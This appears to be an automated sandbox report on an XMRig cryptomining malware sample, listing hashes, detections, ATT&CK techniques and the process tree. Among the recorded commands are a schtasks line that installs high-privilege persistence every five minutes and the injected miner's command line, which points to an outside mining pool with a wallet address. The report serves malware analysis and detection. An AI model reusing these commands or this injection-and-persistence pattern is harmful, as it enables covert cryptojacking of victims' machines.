xmrig | f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093

General

Target

f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exe
Size

2.2MB
MD5

fd2c7234b828082ab12d91f9ac2f77a5
SHA1

7f69beefafe276f7c7acf26fdeddfcd2b2d7b45d
SHA256

f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093
SHA512

e5c24e1a8f35b2f6ed9c80bfd32e554f8f681c4a0e92358ce5ae4881773658268840dec96a1c3dd9ecf4efde7ce302b8662f8a28e7c76a5134d98721f164233a
SSDEEP

12288:SHtRQJ3xBroe2ICXt0JbpWs0pz/rJnw4Atb14XDUGL7r0vwhSGmn//uhmKGI9lg+:SM1knw4E14h7gdG

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3780-149-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3780-150-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/3780-151-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3780-152-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3780-154-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3780-157-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

Processes:

KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exeJW.exe

pid process

3392 KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
3944 JW.exe

pid	process
3392	KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
3944	JW.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exeJW.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	JW.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

JW.exe

description pid process target process

PID 3944 set thread context of 3780 3944 JW.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4536 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

772 timeout.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

JW.exe

pid process

3944 JW.exe
3944 JW.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

description	pid	process	target process
PID 3944 set thread context of 3780	3944	JW.exe	vbc.exe

pid	process
4536	schtasks.exe

pid	process
772	timeout.exe

pid	process
3944	JW.exe
3944	JW.exe

pid	process
668

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exeJW.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	3392	KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
Token: SeDebugPrivilege	3944	JW.exe
Token: SeLockMemoryPrivilege	3780	vbc.exe
Token: SeLockMemoryPrivilege	3780	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

3780 vbc.exe

pid	process
3780	vbc.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exeKFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.execmd.exeJW.execmd.exe

description	pid	process	target process
PID 952 wrote to memory of 3392	952	f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exe	KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
PID 952 wrote to memory of 3392	952	f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exe	KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
PID 3392 wrote to memory of 1472	3392	KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe	cmd.exe
PID 3392 wrote to memory of 1472	3392	KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe	cmd.exe
PID 1472 wrote to memory of 772	1472	cmd.exe	timeout.exe
PID 1472 wrote to memory of 772	1472	cmd.exe	timeout.exe
PID 1472 wrote to memory of 3944	1472	cmd.exe	JW.exe
PID 1472 wrote to memory of 3944	1472	cmd.exe	JW.exe
PID 3944 wrote to memory of 3104	3944	JW.exe	cmd.exe
PID 3944 wrote to memory of 3104	3944	JW.exe	cmd.exe
PID 3104 wrote to memory of 4536	3104	cmd.exe	schtasks.exe
PID 3104 wrote to memory of 4536	3104	cmd.exe	schtasks.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe
PID 3944 wrote to memory of 3780	3944	JW.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exe
"C:\Users\Admin\AppData\Local\Temp\f352fe9435844d9cb53020899ebd16e76dc6347b2bbba9632a7fb96823cb2093.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:952

C:\Users\Admin\AppData\Roaming\KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
"C:\Users\Admin\AppData\Roaming\KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE1AA.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:772

C:\ProgramData\system32\JW.exe
"C:\ProgramData\system32\JW.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JW" /tr "C:\ProgramData\system32\JW.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3104

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JW" /tr "C:\ProgramData\system32\JW.exe"
6⤵
- Creates scheduled task(s)
PID:4536

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 47UkNrHRk4agJcyuYKGhvY4UPDJPELWo3T99w2bjnPGzSrhqXr9fwr6UwxKNSmVuc68LF1yhcqUqoSnCZBwK6WE9Lokat8v -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3780

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\system32\JW.exe
Filesize
833KB

MD5
e94daf09612a7fa6491ff9ff47cd8cae

SHA1
fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

SHA256
0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

SHA512
4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

Download Submit
C:\ProgramData\system32\JW.exe
Filesize
833KB

MD5
e94daf09612a7fa6491ff9ff47cd8cae

SHA1
fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

SHA256
0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

SHA512
4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE1AA.tmp.bat
Filesize
139B

MD5
71f22c1bba09e5b224e7de4a1c0dda17

SHA1
57d69988cba07ff23ee3e153011e889ef9f7b49b

SHA256
e59a199dab3d4dcd3911d61a9f112ceec2f61a382860bf870d49dc91dedeefcc

SHA512
a2f1261e10712c86b912def741343bce8567d4d352e7bac869655bf0002eb0c847735ee02dea53e22235d8db7e05b0f566a4b6e5979a0565dccf389532f88e1f

Download Submit
C:\Users\Admin\AppData\Roaming\KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
Filesize
833KB

MD5
e94daf09612a7fa6491ff9ff47cd8cae

SHA1
fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

SHA256
0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

SHA512
4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

Download Submit
C:\Users\Admin\AppData\Roaming\KFhCHUCFscCBcKSHhBSUSACEFCSSuAefkCKUBscCKASHBusSSFhHKus.exe
Filesize
833KB

MD5
e94daf09612a7fa6491ff9ff47cd8cae

SHA1
fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

SHA256
0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

SHA512
4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

Download Submit
memory/772-142-0x0000000000000000-mapping.dmp

Download
memory/952-132-0x0000000000460000-0x0000000000694000-memory.dmp

Filesize
2.2MB

Download
memory/952-138-0x00007FFF3B820000-0x00007FFF3C2E1000-memory.dmp

Filesize
10.8MB

Download
memory/1472-139-0x0000000000000000-mapping.dmp

Download
memory/3104-146-0x0000000000000000-mapping.dmp

Download
memory/3392-133-0x0000000000000000-mapping.dmp

Download
memory/3392-140-0x00007FFF3B820000-0x00007FFF3C2E1000-memory.dmp

Filesize
10.8MB

Download
memory/3392-137-0x00007FFF3B820000-0x00007FFF3C2E1000-memory.dmp

Filesize
10.8MB

Download
memory/3392-136-0x0000000000A30000-0x0000000000B04000-memory.dmp

Filesize
848KB

Download
memory/3780-150-0x0000000140343234-mapping.dmp

Download
memory/3780-157-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3780-160-0x00000207638D0000-0x00000207638F0000-memory.dmp

Filesize
128KB

Download
memory/3780-149-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3780-159-0x00000207638D0000-0x00000207638F0000-memory.dmp

Filesize
128KB

Download
memory/3780-151-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3780-152-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3780-153-0x0000020763880000-0x00000207638A0000-memory.dmp

Filesize
128KB

Download
memory/3780-154-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3780-158-0x00000207F5A60000-0x00000207F5AA0000-memory.dmp

Filesize
256KB

Download
memory/3944-143-0x0000000000000000-mapping.dmp

Download
memory/3944-156-0x00007FFF3B660000-0x00007FFF3C121000-memory.dmp

Filesize
10.8MB

Download
memory/3944-155-0x00007FFF3B660000-0x00007FFF3C121000-memory.dmp

Filesize
10.8MB

Download
memory/3944-148-0x00007FFF3B660000-0x00007FFF3C121000-memory.dmp

Filesize
10.8MB

Download
memory/4536-147-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads